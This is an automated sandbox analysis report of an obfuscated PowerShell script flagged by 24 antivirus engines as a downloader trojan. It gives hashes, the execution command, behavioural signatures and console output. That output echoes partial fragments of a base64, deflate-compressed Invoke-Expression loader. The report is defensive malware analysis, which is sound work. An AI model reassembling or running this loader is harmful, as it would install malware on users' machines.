Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	June 16, 2023, 9:10 a.m.	June 16, 2023, 9:12 a.m.

Size	5.9KB
Type	ASCII text, with very long lines, with no line terminators
MD5	`f05991652398406655a6a5eebe3e5f3a`
SHA256	`6875ea7bb026e5756b0d5fa0467bc8bbd9922e4d6f1674a1326c7fde53ab8a61`
CRC32	`6560357C`
ssdeep	`96:epXShEpfXAuG74SIfV0FoAllzbEbKyBSvohAd1xLj6K5V/FBHKYaO6BaaqH:kJfXAt7n6YfzomloSd1Bf5V4O6BiH`
Yara	None matched

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\stdio.txt.ps1
3040

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Command line console output was observed (50 out of 84 events)

Time & API	Arguments	Status	Return
WriteConsoleW June 16, 2023, 9:10 a.m.	buffer: Invoke-Expression : You must provide a value expression on the right-hand side console_handle: 0x0000001b	1	1
WriteConsoleW June 16, 2023, 9:10 a.m.	buffer: of the '-' operator. console_handle: 0x00000027	1	1
WriteConsoleW June 16, 2023, 9:10 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\stdio.txt.ps1:1 char:5972 console_handle: 0x00000033	1	1
WriteConsoleW June 16, 2023, 9:10 a.m.	buffer: + (nEw-ObJeCT IO.STrEaMREaDeR((nEw-ObJeCT iO.CoMpReSsiON.dEFLatEsTReaM( [sysT console_handle: 0x0000003f	1	1
WriteConsoleW June 16, 2023, 9:10 a.m.	buffer: eM.iO.meMOrYStReAM][CONvErt]::FROmbaSE64StRing( 'lVr/U+JIFv99q/Z/SOWsCZTCIKgzq7 console_handle: 0x0000004b	1	1
WriteConsoleW June 16, 2023, 9:10 a.m.	buffer: dXFyUqO4gMibje7BQdoNGsIWGTBnWt/O/33utOSALs3jkFE6DzvvV7n/elo9lDTavo743k/TDRazPNW console_handle: 0x00000057	1	1
WriteConsoleW June 16, 2023, 9:10 a.m.	buffer: BkHxvz4zqhqFe2beOvz7/DzYYIrmomu1WZGsOIDWHQRwpswqlXtTNNs7tQ8h99oFWNoRp457vJTY9/4 console_handle: 0x00000063	1	1
WriteConsoleW June 16, 2023, 9:10 a.m.	buffer: Cq8mvPom0NMqGb0WEns/ShRfpCq83hUQvO2Lzm1gwxU/OYL3sYnXl+FgbiKvs9hyasChAxwsLZWMBA9 console_handle: 0x0000006f	1	1
WriteConsoleW June 16, 2023, 9:10 a.m.	buffer: gnf1IfDSQ/KFvIafPyftPCfL7lCgtgOsJsT9Gxpea8acpvLAHd3fgNbBQK+um/uijfvWLJf4QXOIHX+ console_handle: 0x0000007b	1	1
WriteConsoleW June 16, 2023, 9:10 a.m.	buffer: CHc9NHTvB6iIEb8AP9NbBjQRrrl3NY0ZBmdB6k2k0SoJXZuj3wUFGvN7tFLmEd3oeopabtHbvjXzTtZ console_handle: 0x00000087	1	1
WriteConsoleW June 16, 2023, 9:10 a.m.	buffer: 7qZNJGiH6fSHyIhtJxmxA+2Y83rNyZaCl4O2jG6AYMdGD3zit/wwEHSDoe3V7TQ2eUymIDWgXZlMcdj console_handle: 0x00000093	1	1
WriteConsoleW June 16, 2023, 9:10 a.m.	buffer: IID2/uMPoIfWdyN3rlXkB/z7FovICx6/a3vvd2yQyB+qP/4gLz5IyZrZPqJhIs8d+8iMi9rQBYa1njv console_handle: 0x0000009f	1	1
WriteConsoleW June 16, 2023, 9:10 a.m.	buffer: nykAtUqKp9oLsMOB/oEknEd4yhjdvIU7hv7uFH7pTuHhBGkPXXwKRvfdgyXw/qZ5JCerSsKnpDcnZc5 console_handle: 0x000000ab	1	1
WriteConsoleW June 16, 2023, 9:10 a.m.	buffer: Ei8Y/yAkj758SdwLo3eAHHcbgMpm5ECuQY6nqeVaYs3iz1A6FTpUusDmlxSy6e0KIF+tcpOtLibtAt6 console_handle: 0x000000b7	1	1
WriteConsoleW June 16, 2023, 9:10 a.m.	buffer: LUckFKSV7ZDnZ4n2D1n5xH/GnM77rCQ9ex0u7bvARdKKFS/LNexcp4sBOkeNHOk7kLzv/AxRvkftAe0 console_handle: 0x000000c3	1	1
WriteConsoleW June 16, 2023, 9:10 a.m.	buffer: OzlZP8gYzjPVjJcaejGfIO/x7+h7HN0/RY9PKuhUSB7JQGiRPx/CkkMkJbdQ1Ptw+403icI4nGHk+XW console_handle: 0x000000cf	1	1
WriteConsoleW June 16, 2023, 9:10 a.m.	buffer: CGxSufi8lm8/xixi5hS88sp/wRxdRYBrDWwy2U3HK8fMfSwystdH23u2LqNNnzim7t9j5gH9ld/3urT console_handle: 0x000000db	1	1
WriteConsoleW June 16, 2023, 9:10 a.m.	buffer: lN6vrS5mzgXlmB0CECK6jssUQQ6bknJOl7C22I6AJfNdGkGJknUpMW2qYlNWvinSdS2UPQvimdsAUma console_handle: 0x000000e7	1	1
WriteConsoleW June 16, 2023, 9:10 a.m.	buffer: OJHaZPDIzLKIRBsNhUyoqGQJX4PRFrK7VDRGW4KwkcVXs3P8PbxuAXvwZSgCn+dhx8/S2eGCIq1nqOh console_handle: 0x000000f3	1	1
WriteConsoleW June 16, 2023, 9:10 a.m.	buffer: +VonANKI3Af071O9UT+iu+sNrXKPdu/CG96o+d4zx3sa9cOjQ/j/ik+ekfqCQgx/OW59IhpA1Jo+hh/ console_handle: 0x000000ff	1	1
WriteConsoleW June 16, 2023, 9:10 a.m.	buffer: VHo2/IM8v14hEF0/oVvXXM1z/UXE8OTmqfzqGD/decHJ0pr2eHFU1E2PjsKFI34R/eoi091xu3Hrr6l console_handle: 0x0000010b	1	1
WriteConsoleW June 16, 2023, 9:10 a.m.	buffer: lwkRPLSFQqKX8n3y8BTzMDZzd6u+avKCdqA0G/6drNfG4ixx7/Ll2bv6BrS88uRB0C17fvCCcCHf+wk console_handle: 0x00000117	1	1
WriteConsoleW June 16, 2023, 9:10 a.m.	buffer: Xe3WRhVKFAJD/K0h4Q4qdBKkUxyw8tDUQOT7d67xzqJVvMF8Fh/3t+HXJRDBenkYxbeBW1mDh6umfVr console_handle: 0x00000123	1	1
WriteConsoleW June 16, 2023, 9:10 a.m.	buffer: 8g0Xe8l3cOsPZavMaYdRxdrARTcCvjde4M2Xc60Bl+4rXTaPj3N6qXxQ3JxCuUDws8ZidJDivjRSkCQ console_handle: 0x0000012f	1	1
WriteConsoleW June 16, 2023, 9:10 a.m.	buffer: U8bJMkCEy+vBbzgq5RGvUaigvbvU+JP4ri5h00JhAfTg/1vf1O71arcOtd/z0VBe352bMrJOj2GED1m console_handle: 0x0000013b	1	1
WriteConsoleW June 16, 2023, 9:10 a.m.	buffer: G9Kx2Ql/gwM2IPT8x6TUpAEbNJ1Fk47PSeWYjCS7bohoyQ4toy2ZRZka3XK4YJlc4UfKneCVbhM6/kD console_handle: 0x00000147	1	1
WriteConsoleW June 16, 2023, 9:10 a.m.	buffer: JypJ2rO24KqJ0QnwQNpkAPY6TncvvSFtwAr7RviI7gMflVDqq5w4b8zeGnGvq4S1dvPe2Apb5253vRM console_handle: 0x00000153	1	1
WriteConsoleW June 16, 2023, 9:10 a.m.	buffer: 8mQjjyzC2FkuGPiCY+b9ZIEJv1L0m292lvN7LptbycHO34lesv65Wo7UksNrhq9AQrq6ylDbEifuL64 console_handle: 0x0000015f	1	1
WriteConsoleW June 16, 2023, 9:10 a.m.	buffer: JMHOO7pzLzzknqGf1lATF2i0GqEKBHn+RASozjso1mad/toJJOAUFsB4SdaCcZgpEzTqi1lssuKzE5N console_handle: 0x0000016b	1	1
WriteConsoleW June 16, 2023, 9:10 a.m.	buffer: +GTmtqWaETpa6+VZk0ycJWnr8JmZby2d9ivYvRUrDLzwn40hVsNcTivgFrcWHqU3vv4KeOW3TRD1tqS console_handle: 0x00000177	1	1
WriteConsoleW June 16, 2023, 9:10 a.m.	buffer: 3ecmVnKhllhByIakbTFAuEwFrbICYbldNfWMlRMi2i5l1ilSeAyBx0MVGwfhrJ/0Kr1lduVUQc1y7kb console_handle: 0x00000183	1	1
WriteConsoleW June 16, 2023, 9:10 a.m.	buffer: Q0kfMyfqBBR0bZc57vhNMG4nBxhoX5sLExZ3gphB/nW6nZ41ZgPuPtt6QV1vVgHH698CrdiJWKd3BWg console_handle: 0x0000018f	1	1
WriteConsoleW June 16, 2023, 9:10 a.m.	buffer: YcHRWdtf1E/TBdO0GIE5Y2Jt6LF4kmNr1Wq0cQyxiAUQnhKaotb0YwsbD+DnV9H1jFsKORPMaxCNcUE console_handle: 0x0000019b	1	1
WriteConsoleW June 16, 2023, 9:10 a.m.	buffer: hCPBoBXs35z0ZeSsmuf8tiwdq4ZcBP35uEARJl+o356+iy07VGduc/FtORK770DQoLSQHcBjAeSBw26 console_handle: 0x000001a7	1	1
WriteConsoleW June 16, 2023, 9:10 a.m.	buffer: G/7YmJHhqXFlRzDmedzpp+BGnQZgBv8zNa1bY4hu7WdqatIgFFNdmPBtaZLMbdxRQmZKUzJ1SD7oWHQ console_handle: 0x000001b3	1	1
WriteConsoleW June 16, 2023, 9:10 a.m.	buffer: TIh4/BRxS/BX8XHhu16QqbvFYqGN6jqSlr4HGyAk3OANm/tVq6UClSlBu+JLq6tbllhyf4yfwpf64mm console_handle: 0x000001bf	1	1
WriteConsoleW June 16, 2023, 9:10 a.m.	buffer: xqUdk2X12G8RWovJjvsZFMKphfQTdylLWndSrUGBiwNxFHtBYskEX3BGKVJvHWIRSpQm5xsNaE6rqyP console_handle: 0x000001cb	1	1
WriteConsoleW June 16, 2023, 9:10 a.m.	buffer: p612ddFrptWHfDxVM4XfeOFFUhUe8j0fNw+qb2RExN3NfN5LuJ9S4bRCZ7E7fMdoBz7+rvAR8Bb143o console_handle: 0x000001d7	1	1
WriteConsoleW June 16, 2023, 9:10 a.m.	buffer: 8h9Q1g3gcIuVP+w0dxoquWQ3dC6niknejTiCPpJXMTF1h6L9Agj7k6eMMo7zEk0D42IOiWbJc6HUlOn console_handle: 0x000001e3	1	1
WriteConsoleW June 16, 2023, 9:10 a.m.	buffer: 6uOsCFQ1h9hWdEhrcyWyIMnykDzgDhsxwBj0foglaMTIZ6vFPVh/AKWWEQobcWeEUJfsTMdd1omdaWf console_handle: 0x000001ef	1	1
WriteConsoleW June 16, 2023, 9:10 a.m.	buffer: wf6TiPkTY9V+l2sMk81hKNwT6lGaVNcrteC4rR/h7vHNLRPRWtjzCcKGIlAXOk4GThlhgYdZHbiS4c7 console_handle: 0x000001fb	1	1
WriteConsoleW June 16, 2023, 9:10 a.m.	buffer: 1l72TUTVknwhFEmGgq7ArpVZXdt2OZ12tZYj/KFRag7ESE0RuOcIIZpjEbm/p625N6oW93bkmYBaDjU console_handle: 0x00000207	1	1
WriteConsoleW June 16, 2023, 9:10 a.m.	buffer: 3K2TZK2B3E68lnHFogAUjTmBbNbSsmIaAIoYmqe4DVlAy+fnstwJunOEOe7DLKOotv2MCoVWcr0lwDJ console_handle: 0x00000213	1	1
WriteConsoleW June 16, 2023, 9:10 a.m.	buffer: cFEiVSS2SXq2DpQp8yIVKe3OYMR84ObssLmUKmDmDSd8/KaDf5O2A6hpe/g9fqN/L0Pk+maA8MuQbn5 console_handle: 0x0000021f	1	1
WriteConsoleW June 16, 2023, 9:10 a.m.	buffer: vHGi140bCROpLWdEoxUKaXdN27tkAAshiTmfOdxMeMCtWyA+GD7clHPxLysYpmWPWYV2u7HHpMZ+D/T console_handle: 0x0000022b	1	1
WriteConsoleW June 16, 2023, 9:10 a.m.	buffer: tk/7+wiN1hfxL2Q+xfMg8IgOSc9R6Zcw2axU8RdnWIBbBgBlQtWOAzHlyBS8GCMbRNWuO1dXlZpYKks console_handle: 0x00000237	1	1
WriteConsoleW June 16, 2023, 9:10 a.m.	buffer: c0dlP16W+0Hb80DrdlIvpyT5tKcoIyPstCO6WjWS1IPmYNhX8CwjiUY2hV/jD1Uo64LyCPwE8ivV/R/ console_handle: 0x00000243	1	1
WriteConsoleW June 16, 2023, 9:10 a.m.	buffer: HPxDxyqrog3dgacapDUqPwYq/LXaCuM/7PlaFYoxuHtlQqPkBs4EiiuH3Q2sjaS9VitiPFZlgwzp7Vu console_handle: 0x0000024f	1	1
WriteConsoleW June 16, 2023, 9:10 a.m.	buffer: 342OiTVwxecpvUPL3iUfiGoKckY0etyUeGgMVAV6JC8vWBUleuTWeY5G6E8v9DuTZadRhQysuD+ZKDS console_handle: 0x0000025b	1	1
WriteConsoleW June 16, 2023, 9:10 a.m.	buffer: 5NCdKS3KWafFtHTEs3BEZILiJywZKllkgzhjmLSK5bs2Dadk+j1cgntCzU/3sN65fz09MMABH/PHitC console_handle: 0x00000267	1	1

Uses Windows APIs to generate a cryptographic key (6 events)

Time & API	Arguments	Status	Return
CryptExportKey June 16, 2023, 9:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x064814a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 16, 2023, 9:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x064814a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 16, 2023, 9:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x064814a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 16, 2023, 9:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x064814a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 16, 2023, 9:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x064814a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 16, 2023, 9:10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x064814a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx June 16, 2023, 9:10 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (29 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory June 16, 2023, 9:10 a.m.	process_identifier: 3040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0276b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 16, 2023, 9:10 a.m.	process_identifier: 3040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0277f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 16, 2023, 9:10 a.m.	process_identifier: 3040 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 16, 2023, 9:10 a.m.	process_identifier: 3040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 16, 2023, 9:10 a.m.	process_identifier: 3040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 16, 2023, 9:10 a.m.	process_identifier: 3040 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef30000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 16, 2023, 9:10 a.m.	process_identifier: 3040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 16, 2023, 9:10 a.m.	process_identifier: 3040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02709000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 16, 2023, 9:10 a.m.	process_identifier: 3040 region_size: 1769472 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x061e0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 16, 2023, 9:10 a.m.	process_identifier: 3040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06350000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 16, 2023, 9:10 a.m.	process_identifier: 3040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06351000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 16, 2023, 9:10 a.m.	process_identifier: 3040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06352000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 16, 2023, 9:10 a.m.	process_identifier: 3040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06353000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 16, 2023, 9:10 a.m.	process_identifier: 3040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06354000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 16, 2023, 9:10 a.m.	process_identifier: 3040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06355000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 16, 2023, 9:10 a.m.	process_identifier: 3040 region_size: 16384 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06356000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 16, 2023, 9:10 a.m.	process_identifier: 3040 region_size: 69632 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0635a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 16, 2023, 9:10 a.m.	process_identifier: 3040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0636b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 16, 2023, 9:10 a.m.	process_identifier: 3040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0636c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 16, 2023, 9:10 a.m.	process_identifier: 3040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0636d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 16, 2023, 9:10 a.m.	process_identifier: 3040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0636e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 16, 2023, 9:10 a.m.	process_identifier: 3040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06150000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 16, 2023, 9:10 a.m.	process_identifier: 3040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06151000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 16, 2023, 9:10 a.m.	process_identifier: 3040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06152000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 16, 2023, 9:10 a.m.	process_identifier: 3040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06153000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 16, 2023, 9:10 a.m.	process_identifier: 3040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06154000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 16, 2023, 9:10 a.m.	process_identifier: 3040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06155000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 16, 2023, 9:10 a.m.	process_identifier: 3040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05431000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 16, 2023, 9:10 a.m.	process_identifier: 3040 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05670000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

File has been identified by 24 AntiVirus engines on VirusTotal as malicious (24 events)

Lionic	Trojan.Script.Boxter.4!c
MicroWorld-eScan	Heur.BZC.PZQ.Boxter.797.CBF9E798
FireEye	Heur.BZC.PZQ.Boxter.797.CBF9E798
VIPRE	Heur.BZC.PZQ.Boxter.797.CBF9E798
Arcabit	Heur.BZC.PZQ.Boxter.797.CBF9E798
Cyren	PSH/Kryptik.A.gen!Camelot
Symantec	ISB.Downloader!gen173
ESET-NOD32	PowerShell/Kryptik.BQ
Cynet	Malicious (score: 99)
BitDefender	Heur.BZC.PZQ.Boxter.797.CBF9E798
Tencent	Win32.Trojan.Powershell.Ugil
Sophos	Mal/PSDL-J
F-Secure	Trojan.TR/PowerShell.Gen
McAfee-GW-Edition	Artemis!Trojan
Emsisoft	Heur.BZC.PZQ.Boxter.797.CBF9E798 (B)
Avira	TR/PowerShell.Gen
Microsoft	Trojan:Script/Wacatac.B!ml
ViRobot	HTML.Z.Agent.6020
GData	Heur.BZC.PZQ.Boxter.797.CBF9E798
Google	Detected
AhnLab-V3	Trojan/PowerShell.Obfuscated
ALYac	Heur.BZC.PZQ.Boxter.797.CBF9E798
MAX	malware (ai score=80)
Fortinet	BAT/Kryptik.Q!tr

stdio.txt.ps1

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All